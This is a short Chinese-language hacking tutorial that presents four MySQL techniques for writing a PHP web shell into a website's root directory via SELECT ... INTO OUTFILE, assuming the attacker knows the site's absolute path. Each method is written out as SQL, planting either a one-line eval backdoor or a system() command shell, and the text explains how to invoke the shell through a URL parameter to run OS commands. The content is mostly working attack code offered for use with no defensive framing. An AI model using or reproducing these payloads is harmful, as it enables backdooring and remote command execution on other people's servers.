注:一下所有方法得先知道網站的絕對路徑
第一種
-
CREATE TABLE`mysql`.`darkmoon`(`darkmoon1`TEXT NOTNULL);
-
INSERT INTO`mysql`.`darkmoon`(`darkmoon1`)VALUES(‘<?php@eval($_POST[pass]);?>’);
-
SELECT`darkmoon1`FROM`darkmoon`INTO OUTFILE’d:/wamp/www/exehack.php’;
-
DROP TABLE IFEXISTS`darkmoon`;
(這種方法是最爲常見的成功率也比較高,懂sql語句的朋友一眼就應該可以看懂什麼意思)
以上代碼意思就是選擇musql數據庫 然後建立一個darkmoon的表然後加入一個名字爲darkmoon1的字段
然後在darkmoon1的字段中插入一句話代碼
然後從darkmoon1字段裏面導出一句話到d:/wamp/www/exehack.php 的文件名(這裏的路徑就是網站的程序路徑)
最後就是刪除darkmoon這個表。
第二種方法
-
Create TABLE moon(darkmoon text NOTNULL);
-
Insert INTO moon(darkmoon)VALUES(‘<?php@eval($_POST[pass]);?>’);
-
select darkmoon from moon into outfile’d:/wamp/www/exehack.php’;
-
Drop TABLE IFEXISTS moon;
以上方法原理基本與方法一一致
第三種方法:
-
select'<?php@eval($_POST[pass]);?>’INTO OUTFILE’d:/wamp/www/exehack.php’
第四種方法
-
select'<?phpecho\'<pre>\’;system($_GET[\’cmd\’]);echo\'</pre>\’;?>’INTO OUTFILE’d:/wamp/www/exehack.php’
不同之處在於導出成功後可以直接執行DOS命令(只要權限夠大)
使用方法:www.xxx.com/exehack.php?cmd= (cmd=後面直接執行dos命令)
以上4種方法一般情況下足夠拿到網站的webshell權限了。
